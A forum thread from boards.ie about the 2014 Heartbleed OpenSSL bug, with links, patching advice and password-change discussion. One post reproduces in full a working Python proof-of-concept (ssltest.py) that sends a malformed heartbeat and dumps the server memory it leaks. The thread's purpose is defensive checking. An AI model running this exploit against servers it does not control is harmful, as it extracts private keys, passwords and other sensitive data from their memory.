Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Openssl bug

Comments

  • Banned (with Prison Access) Posts: 30 Mr Reese




  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops



    If you want to check if you are vulnerable you can use the following PoC:

    http://s3.jspenguin.org/ssltest.py

    Not my work, I hasten to add.


  • Registered Users, Registered Users 2 Posts: 203 ✭✭industrialhorse


    This may be somewhat useful.

    http://filippo.io/Heartbleed/


  • Technology & Internet Moderators Posts: 28,830 Mod ✭✭✭✭oscarBravo


    ssltest.py is 403ing, but the author has disclaimed copyright, so here it is:
    #!/usr/bin/python
    
    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
    # The author disclaims copyright to this source code.
    
    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser
    
    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
    
    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')
    
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01                                  
    ''')
    
    hb = h2bin(''' 
    18 03 02 00 03
    01 40 00
    ''')
    
    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print
    
    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time() 
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata
            
    
    def recvmsg(s):
        hdr = recvall(s, 5)
        if hdr is None:
            print 'Unexpected EOF receiving record header - server closed connection'
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            print 'Unexpected EOF receiving record payload - server closed connection'
            return None, None, None
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
        return typ, ver, pay
    
    def hit_hb(s):
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'No heartbeat response received, server likely not vulnerable'
                return False
    
            if typ == 24:
                print 'Received heartbeat response:'
                hexdump(pay)
                if len(pay) > 3:
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                else:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'
                return True
    
            if typ == 21:
                print 'Received alert:'
                hexdump(pay)
                print 'Server returned error, likely not vulnerable'
                return False
    
    def main():
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return
    
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print 'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print 'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)
        print 'Waiting for Server Hello...'
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ == None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break
    
        print 'Sending heartbeat request...'
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)
    
    if __name__ == '__main__':
        main()
    


  • Registered Users, Registered Users 2 Posts: 8,625 ✭✭✭brevity


    http://heartbleed.com/

    A lot of info here that could be useful/interesting to some.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 1,987 ✭✭✭Ziycon


    Came across an issue or two, some servers reporting versions outside the affected versions of 1.0.1 - 1.0.1f and 1.0.2-beta but online tools are reporting that the servers are still vulnerable, for example, on 1.0.0g and this branch is said by openssl.org not to be affected but the online scanners are saying it is.

    Don't go by the version openssl is reporting to be on the safe side as bundled openssl with some OS's tend to report conflicting information, never hurts to have the latest version install either way.


  • Registered Users, Registered Users 2 Posts: 15,956 ✭✭✭✭Villain


    You need to restart services for the new library to take affect, you check what is running on old library using
    grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u


  • Registered Users, Registered Users 2 Posts: 4,188 ✭✭✭wil


    Anyone suggest anything in the law of unintended consequences of multi millions of users changing passwords over the next few days.

    Saw one suggestion to give the internet a miss for a few days.


  • Registered Users, Registered Users 2 Posts: 203 ✭✭industrialhorse


    identropy.com suggest passphrases or a password manager. I think they may be onto a winner........

    http://blog.identropy.com/IAM-blog/bid/109952/heartbleeds-silver-lining?source=Blog_Email_%5bHeartbleed%27s%20Silver%20%5d


  • Technology & Internet Moderators Posts: 28,830 Mod ✭✭✭✭oscarBravo


    heartbleed_explanation.png


  • Advertisement
  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    I wish there was a version of XKCD for explaining the news and various life events. And women. And taxes. And some sports. And everything really.


  • Registered Users, Registered Users 2 Posts: 5,112 ✭✭✭Blowfish


    I'm sure some of you have seen it, but there were two interesting posts from one of the OpenBSD devs on how it's not just a matter of programmer error, but a much larger issue in that it would have been discovered far far earlier, but for stupid design decisions.


  • Registered Users, Registered Users 2 Posts: 15,956 ✭✭✭✭Villain




  • Closed Accounts Posts: 1,260 ✭✭✭Rucking_Fetard


    Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks
    It just got easier to exploit the catastrophic Heartbleed vulnerability against wireless networks and the devices that connect to them thanks to the release last week of open source code that streamlines the process of plucking passwords, e-mail addresses, and other sensitive information from vulnerable routers and connected clients.

    Dubbed Cupid, the code comes in the form of two software extensions. The first gives wireless networks the ability to deploy "evil networks" that surreptitiously send malicious packets to connected devices. Client devices relying on vulnerable versions of the OpenSSL cryptography library can then be forced to transmit contents stored in memory. The second extension runs on client devices. When connecting to certain types of wireless networks popular in corporations and other large organizations, the devices send attack packets that similarly pilfer data from vulnerable routers.

    The release of Cupid comes eight weeks after the disclosure of Heartbleed


  • Registered Users, Registered Users 2 Posts: 15,956 ✭✭✭✭Villain


    More bugs released today https://t.co/ZIIyHE8O5C


  • Closed Accounts Posts: 1,260 ✭✭✭Rucking_Fetard




  • Registered Users, Registered Users 2 Posts: 37,485 ✭✭✭✭Khannie


    Jaysus. :/


Advertisement